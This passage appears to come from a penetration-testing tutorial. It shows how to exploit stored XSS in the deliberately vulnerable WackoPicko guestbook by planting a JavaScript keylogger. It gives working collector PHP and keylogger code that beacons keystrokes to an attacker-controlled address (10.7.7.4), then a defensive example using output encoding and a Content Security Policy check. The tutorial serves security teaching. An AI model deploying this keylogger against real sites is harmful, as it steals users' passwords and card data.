Another way to take advantage of XSS's ability to gather users' sensitive information is by turning the browser into a key logger that captures every keystroke and sends it to a server controlled by the attacker. These keystrokes may include sensitive information that the user enters in the page, such as names, addresses, passwords, secret questions and responses, credit card information, and other types, depending on the purpose of the vulnerable page.
We will use the Apache web server, which is preinstalled in Kali Linux, in order to store the keystrokes in a file so that we can check the keys sent by the vulnerable application once we exploit the XSS. The server will have two files: klog.php and klog.js.
This is how the klog.php file will look:
```php
<?php
// Append whatever arrives in the "k" query parameter to keys.txt
if (!empty($_GET['k'])) {
    $file = fopen('keys.txt', 'a');
    fwrite($file, $_GET['k']);
    fclose($file);
}
?>
```
This is how the klog.js file will look:
```javascript
var buffer = [];
var server = 'http://10.7.7.4/klog.php?k=';

// Record every key pressed anywhere in the page
document.onkeypress = function(e) {
    buffer.push(e.key);
};

// Every 200 ms, send the buffered keys to the server as an image request
window.setInterval(function() {
    if (buffer.length > 0) {
        var data = encodeURIComponent(buffer);
        new Image().src = server + data;
        buffer = [];
    }
}, 200);
```
Here, 10.7.7.4 is the address of the Kali Linux machine, so victims send the buffer to that server. Depending on the system's configuration, you may have to create the keys.txt file in the path specified in the code; in this example, that is the web root (/var/www/html/). You should also add write permissions to the file or set its ownership to Apache's user (www-data) so that the web server does not hit a permission error when it appends to the file:
```bash
touch /var/www/html/keys.txt
chown www-data /var/www/html/keys.txt
```
This is the simplest version of a key logger. A more sophisticated version could include the following:
- Timestamp of the capture
- Identifier of the user or machine sending the information
- Saving keys to a database to facilitate queries, grouping, and sorting
- Controlling functionality, such as starting and stopping key loggers, triggering actions on certain keys or combinations
Using WackoPicko's Guestbook again, submit the following comment:
This will load the external JavaScript file in the page every time a user accesses the Guestbook page and capture all of the keystrokes issued by them. You can now type anything while in the page, and it will be sent to your server.
If you want to check what has been recorded so far, you just need to see the keys.txt file in Kali Linux:
You can see that, because keys are buffered in the client and sent at regular intervals, the file contains groups of varying lengths separated by commas, and nonprintable keys are written by name: ArrowLeft, ArrowRight, Backspace, Home, End, and so on.
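As an added example (not code from the original tutorial, from WackoPicko, or from Kali), the following JavaScript shows the two application-side controls that stop this kind of stored-XSS key logger: output encoding, so that a comment containing `<script src=...>` is displayed as text instead of being parsed, and a Content Security Policy, so that even if an injection does land, `script-src 'self'` blocks the load of klog.js from 10.7.7.4 and `img-src 'self'` blocks the `new Image().src` beacon that carries the keystrokes. The `parseCsp`/`isAllowedByCsp` functions are a deliberately small model of CSP source matching (`'self'`, `'none'`, explicit origins) written for this example, not a full CSP implementation, and the sample comment and the `vulnerable-app.example` page URL are constructed.

```javascript
// Added example: defensive controls against a stored-XSS key logger.
// The CSP evaluator is a simplified model of source matching, not a full parser.

// 1. Output encoding: escape the five characters that matter in HTML text
//    and attribute contexts, so user-controlled markup is shown literally.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render stored guestbook comments as safe HTML list items.
function renderComments(comments) {
  return comments.map((c) => `<li>${escapeHtml(c)}</li>`).join('');
}

// 2. Content Security Policy. parseCsp turns a header value such as
//    "default-src 'self'; script-src 'self'; img-src 'self'" into
//    { 'default-src': ["'self'"], 'script-src': ["'self'"], 'img-src': ["'self'"] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [directive, ...sources] = tokens;
    policy[directive.toLowerCase()] = sources;
  }
  return policy;
}

function originOf(url) {
  return new URL(url).origin; // scheme + host + port
}

// Decide whether a fetch governed by `directive` (e.g. 'script-src') for
// `resourceUrl` is permitted on a page at `pageUrl`. Falls back to
// default-src when the specific directive is absent; an empty source list
// means nothing is allowed, as with 'none'.
function isAllowedByCsp(policy, directive, resourceUrl, pageUrl) {
  const sources = policy[directive] || policy['default-src'];
  if (!sources) return true; // no applicable directive: CSP does not restrict it
  const pageOrigin = originOf(pageUrl);
  const resourceOrigin = originOf(resourceUrl);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return resourceOrigin === pageOrigin;
    return src === resourceOrigin; // an explicitly allow-listed origin
  });
}

// Constructed sample data: a comment carrying an external script tag, and a
// hypothetical guestbook page URL.
const SAMPLE_COMMENT = '<script src="http://10.7.7.4/klog.js"></script>';
const PAGE_URL = 'http://vulnerable-app.example/guestbook';
const POLICY = parseCsp("default-src 'self'; script-src 'self'; img-src 'self'");

console.log('Escaped comment :', renderComments([SAMPLE_COMMENT]));
console.log('klog.js allowed :', isAllowedByCsp(POLICY, 'script-src', 'http://10.7.7.4/klog.js', PAGE_URL));
console.log('beacon allowed  :', isAllowedByCsp(POLICY, 'img-src', 'http://10.7.7.4/klog.php?k=abc', PAGE_URL));
console.log('own script ok   :', isAllowedByCsp(POLICY, 'script-src', 'http://vulnerable-app.example/app.js', PAGE_URL));
```

Output encoding is the primary fix, since it removes the injection point itself; the CSP is defence in depth that also makes the attack visible, because browsers report blocked loads to the console and, with a `report-uri`/`report-to` directive configured, to the server, which gives the defender a detection signal for the attempted script load and the exfiltration beacon.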